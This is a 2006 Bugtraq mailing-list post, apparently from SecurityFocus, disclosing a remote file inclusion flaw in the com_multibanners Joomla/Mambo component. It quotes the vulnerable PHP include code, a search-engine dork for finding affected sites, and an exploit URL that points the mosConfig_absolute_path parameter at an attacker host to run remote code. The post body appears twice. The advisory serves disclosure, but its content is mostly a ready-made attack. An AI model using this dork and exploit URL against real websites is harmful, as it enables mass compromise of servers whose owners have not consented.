Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
Jul 20 2006 04:53PM
mail blue-spy net
#############################SolpotCrew Community################################
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
########################################################################
#########
#
#
# Bug Found By :Blue|Spy
#
# contact: mail (at) blue-spy (dot) net [email concealed]
#
# Website : http://kunamgede.biz, http://blue-spy.net
#
########################################################################
########
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
code from extadminmenus.class.php
if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}
Dork:
inurl:com_multibanners
exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadm
inmenus.class.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
########################################################################
#########
#
#
# Bug Found By :Blue|Spy
#
# contact: mail (at) blue-spy (dot) net [email concealed]
#
# Website : http://kunamgede.biz, http://blue-spy.net
#
########################################################################
########
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
code from extadminmenus.class.php
if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}
Dork:
inurl:com_multibanners
exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadm
inmenus.class.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
[ reply ]